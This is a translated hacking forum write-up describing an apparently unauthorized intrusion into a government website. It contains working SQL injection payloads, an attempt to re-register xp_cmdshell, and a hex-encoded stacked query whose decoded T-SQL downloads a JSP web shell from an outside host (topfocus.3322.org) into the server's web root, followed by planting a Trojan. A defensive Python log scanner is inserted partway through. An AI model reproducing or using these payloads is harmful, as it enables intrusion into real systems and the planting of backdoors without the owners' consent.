Author: kiss
Source: Lenk Technology Alliance
I don't know how many people have read Harry Potter. I'm a typical Harry Potter fan: I read it from childhood until the last book, Deathly Hallows, was released, and its content indeed exceeded most people's expectations, as befits the greatest hero. I remember that some time ago I met a girl from Lanzhou on a Harry Potter fans' forum. Just a few days ago she sent me a website she said was from her boyfriend's hometown; out of curiosity, she wanted to see where her boyfriend was. I opened it. Familiar layout: I remembered it from the post I made on the forum some time ago (JSP direct privilege escalation). This is also a JSP program, so I planned to test it. We can see that it is not a case of directly escalating privileges by executing commands through CMD.
To start: telnet www.XXXX.GOV.CN 3389 returned 'Connection to the host cannot be opened, on port 3389: Connection failed'. Telnet to port 1433 failed the same way. So I scanned it with X-Scan-v3.3: only ports 21 and 80 are open. Depressing; it is probably on an intranet. The only place to start is port 80. A frantic scan with the Ah D injection tool (Figure 1): the injection point still exists. I am a script kiddie, so all this manual work is handed over to the tool. Figure 2 shows that things look good: MSSQL database with SA permissions. Now let's see whether xp_cmdshell has been deleted. Depressing, things are not as good this time: it returns straight to the home page (Figure 3).
In this case, we are submitting:
http://www.XXX.gov.cn/XXX/hdsq/XXXXXfo.jsp?ID=8;EXEC master.dbo.sp_addextendedproc xp_cmdshell, xplog70.dll to restore it (Figure 4). Still no luck. This is a dilemma. Check the injection point, check the database type, check the database permissions: what is going on? Is it being filtered? So submit http://www.XXX.gov.cn/XXX/hdsq/XXXXXfo.jsp?ID=8;EXEC, which returns Figure 4.
Submit http://www.XXX.gov.cn/XXX/hdsq/XXXXXfo.jsp?ID=8;EXEC (Figure 5): it returns straight to the home page. However, getting a SHELL through JSP backup may take a long time, and it might be dealt with in the meantime. Wait...
A long while later.....
JSP backup escalation relies on a downloaded SHELL, which cannot be downloaded directly with SQL statements in IE.. Haha, I am so talented. The next step is listing directories, but a problem arises: James cannot, but Ah D can (Figure 6). It seems you cannot trust only one tool.
After a while I finally learned that the web directory is under d:\java\Tomcat 5.5\web1_xxx. Now we use an SQL statement to download it directly (a reminder for newbies: change the jsp to be saved to .zip or .rar format, otherwise .......).
Next, submit the following in IE (Figure 7):
http://www.XXXX.gov.cn/XXX/hdsq/XXXXfo.jsp?ID=8;DECLARE @s varchar(4000);SET @s=CAST([long hex literal elided] as varchar(4000));EXEC(@s);--
The DECLARE @s varchar(4000);SET @s=CAST([long hex literal elided] as varchar(4000));EXEC(@s);-- part above is the EXEC-encoded form: the whole statement is hex-encoded and then run with EXEC.
The encoded SQL statement, decoded, is as follows:
DECLARE
@b varbinary(8000),
@hr int,
@http int,
@down int
EXEC sp_oacreate [Microsoft.XMLHTTP], @http output
EXEC @hr = sp_oamethod @http, [Open], null, [GET], http://topfocus.3322.org/jsp.zip,, 0
EXEC @hr = sp_oamethod @http, [Send], null
EXEC @hr = sp_OAGetProperty @http, [responseBody], @b output
EXEC @hr = sp_oacreate [ADODB.Stream], @down output
EXEC @hr = sp_OASetProperty @down, [Type], 1
EXEC @hr = sp_OASetProperty @down, [mode], 3
EXEC @hr = sp_oamethod @down, [Open], null
EXEC @hr = sp_oamethod @down, [Write], null, @b
EXEC @hr = sp_oamethod @down, [SaveToFile], null, [d:\java\Tomcat 5.5\web#xxxx1.jsp], 1 ;--
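As an added defensive example (not code from the original post), the following Python scans constructed web access-log lines for the pattern used in this write-up: stacked queries appended to a parameter, a statement hidden inside a hex literal and run through EXEC, and calls to the OLE automation procedures or xp_cmdshell. The combined-log-format layout, the sample URIs and the helper names are assumptions.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# MSSQL procedures abused in the write-up: OLE automation to fetch and
# write a file, and re-registering xp_cmdshell. Any of them in a request
# parameter is a strong stacked-query injection signal.
SUSPICIOUS = ("sp_oacreate", "sp_oamethod", "sp_oagetproperty",
              "sp_oasetproperty", "sp_addextendedproc", "xp_cmdshell")
# CAST(0x... AS varchar) hides the real statement from naive keyword filters.
HEX_LITERAL = re.compile(r"0x([0-9a-f]{8,})", re.I)

def decode_hex_literals(sql: str) -> str:
    """Replace long 0x literals with their text (latin-1; NULs dropped so
    UTF-16 payloads meant for nvarchar read normally too)."""
    def repl(m):
        raw = m.group(1)
        if len(raw) % 2:          # odd length: not a byte string, leave it
            return m.group(0)
        return bytes.fromhex(raw).decode("latin-1").replace("\x00", "")
    return HEX_LITERAL.sub(repl, sql)

def inspect_request(log_line: str) -> dict:
    """Report injection indicators for one combined-log-format line."""
    m = re.search(r'"(?:GET|POST)\s+(\S+)', log_line)
    if not m:
        return {"uri": None, "decoded_query": "", "findings": []}
    uri = m.group(1)
    query = unquote_plus(urlsplit(uri).query)
    decoded = decode_hex_literals(query)
    findings = []
    if re.search(r";\s*(exec|declare)\b", decoded, re.I):
        findings.append("stacked-query")
    if decoded != query:
        findings.append("hex-encoded-statement")
    findings += [p for p in SUSPICIOUS if p in decoded.lower()]
    return {"uri": uri, "decoded_query": decoded, "findings": findings}

# Constructed sample lines (not real traffic): a normal request, the plain
# xp_cmdshell re-registration, and a hex-wrapped sp_oacreate script.
HIDDEN = "EXEC sp_oacreate 'Microsoft.XMLHTTP',@h output"
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2009:10:00:00 +0800] "GET /hdsq/info.jsp?ID=8 HTTP/1.1" 200',
    '203.0.113.5 - - [01/Jan/2009:10:01:00 +0800] "GET /hdsq/info.jsp?ID=8;EXEC%20master.dbo.'
    'sp_addextendedproc%20xp_cmdshell,%27xplog70.dll%27-- HTTP/1.1" 302',
    '203.0.113.5 - - [01/Jan/2009:10:02:00 +0800] "GET /hdsq/info.jsp?ID=8;DECLARE%20@s%20varchar(4000);'
    'SET%20@s=CAST(0x' + HIDDEN.encode().hex() + '%20AS%20varchar(4000));EXEC(@s);-- HTTP/1.1" 302',
]

def scan_log(lines=SAMPLE_LOG) -> list:
    """Return only the requests that carry at least one finding."""
    return [r for r in map(inspect_request, lines) if r["findings"]]
```

Run it against real Tomcat access logs by passing the lines to scan_log; the decoded_query field shows what a hex-wrapped statement actually does.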
Next, visit http://www.xxx.gov.cn/xxx/1.jsp (Figure 8).
Time to celebrate... The next step is to upload the JSP Trojan (Figure 9).
Visit our Trojan.. http://www.xxx.gov.cn/xxx/tops-files.jsp (Figure 10)
Because it is a GOV site, all sensitive information has been masked...
Thanks to Lenk for the guidance....
My line of thought isn't clearly written; just have a look..